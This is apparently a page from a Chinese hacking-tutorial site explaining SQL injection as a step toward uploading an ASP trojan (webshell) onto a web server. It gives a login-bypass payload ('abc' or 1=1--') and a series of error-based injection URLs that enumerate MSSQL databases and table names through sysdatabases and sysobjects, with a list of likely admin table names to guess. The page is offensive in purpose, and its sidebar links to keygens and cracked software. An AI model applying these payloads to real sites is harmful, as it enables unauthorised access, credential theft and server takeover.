什么是SQL注入法攻击

• 所谓ASP木马，就是一段有特殊功能的ASP代码，并放入WEB虚拟目录的Scripts下，远程客户通过IE就可执行它，进而得到系统的USER权限，实现对系统的初步控制。上传ASP木马一般有两种比较有效的方法：
  1、利用WEB的远程管理功能
  许多WEB站点，为了维护的方便，都提供了远程管理的功能；也有不少WEB站点，其内容是对于不同的用户有不同的访问权限。为了达到对用户权限的控制，都有一个网页，要求用户名与密码，只有输入了正确的值，才能进行下一步的操作,可以实现对WEB的管理，如上传、下载文件，目录浏览、修改配置等。
  因此，若获取正确的用户名与密码，不仅可以上传ASP木马，有时甚至能够直接得到USER权限而浏览系统，上一步的“发现WEB虚拟目录”的复杂操作都可省略。
  用户名及密码一般存放在一张表中，发现这张表并读取其中内容便解决了问题。以下给出两种有效方法。
  A、 注入法：
  从理论上说，认证网页中会有型如：
  select * from admin where username='XXX' and passWord='YYY' 的语句，若在正式运行此句之前，没有进行必要的字符过滤，则很容易实施SQL注入。
  
  如在用户名文本框内输入：abc’ or 1=1-- 在密码框内输入：123 则SQL语句变成：
  select * from admin where username='abc’ or 1=1 and password='123’ 不管用户输入任何用户名与密码，此语句永远都能正确执行，用户轻易骗过系统，获取合法身份。
  B、猜解法：
  基本思路是：猜解所有数据库名称，猜出库中的每张表名，分析可能是存放用户名与密码的表名，猜出表中的每个字段名，猜出表中的每条记录内容。
  l 猜解所有数据库名称
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因为 dbid 的值从1到5，是系统用了。所以用户自己建的一定是从6开始的。并且我们提交了 name>1 (name字段是一个字符型的字段和数字比较会出错),abc.asp工作异常，可得到第一个数据库名，同理把DBID分别改成7,8，9,10,11,12…就可得到所有数据库名。
  以下假设得到的数据库名是TestDB。

  l 猜解数据库中用户名表的名称
  猜解法：此方法就是根据个人的经验猜表名，一般来说，user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通过语句进行判断
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在，则abc.asp工作正常，否则异常。如此循环，直到猜到系统帐号表的名称。
  读取法：SQL-SERVER有一个存放系统核心信息的表sysobjects，有关一个库的所有表，视图等信息全部存放在此表中，而且此表可以通过WEB进行访问。
  当xtype='U' and status>0代表是用户建立的表，发现并分析每一个用户建立的表及名称，便可以得到用户名表的名称，基本的实现方法是：
  ①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type='U' and status>0 )>0 得到第一个用户建立表的名称，并与整数进行比较，显然abc.asp工作异常，但在异常中却可以发现表的名称。假设发现的表名是xyz，则
  ②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in('xyz'))>0 可以得到第二个用户建立的表的名称，同理就可得到所有用建立的表的名称。
  

• 上一页 [1] [2] [3] [4] [5] [6] [7] [8] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 什么是SQL注入法攻击 相关文章：
• ·asp代码-注册登陆代码
• ·注册表修改大全之XP
• ·2005 最新注册码大全
• ·注册表知识：HKEY_LOCAL_MACHINE根键详解
• ·Coreldraw12官方简体中文版下载及注册码
• ·注册表应用100例—注册表使用全攻略之十一
• ·软件注册码、安装序列号☆集锦
• ·什么是SQL注入法攻击
• ·在jsp中用bean和servlet联合实现用户注册、登录
• ·cmd下修改注册表完全攻略
• 什么是SQL注入法攻击 相关软件
• ·VirtuaGirl 虚拟女孩 V2.08 汉化注册版
• ·注册码生成器 V1.0
• ·COCO电脑监控系统 V 7.66 注册版
• ·统一驾照模拟考试系统v3.0　驾校版　+　注册机
• ·儿童经典诵读—名篇精品欣赏注音读本（专家朗诵版） V3.0.8.8
• ·注册表修改工具 V4.0
• ·Fraps游戏录影 注册版
• ·《实况足球9欧洲版》全系列注册表导入器
• ·理正电气 CAD Build 20612 免费注册版
• ·RegFix注册表关键键值修复工具 V1.21

上一篇:jsp实现图形验证码

下一篇:Photoshop一种反转片效果的制作方法

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐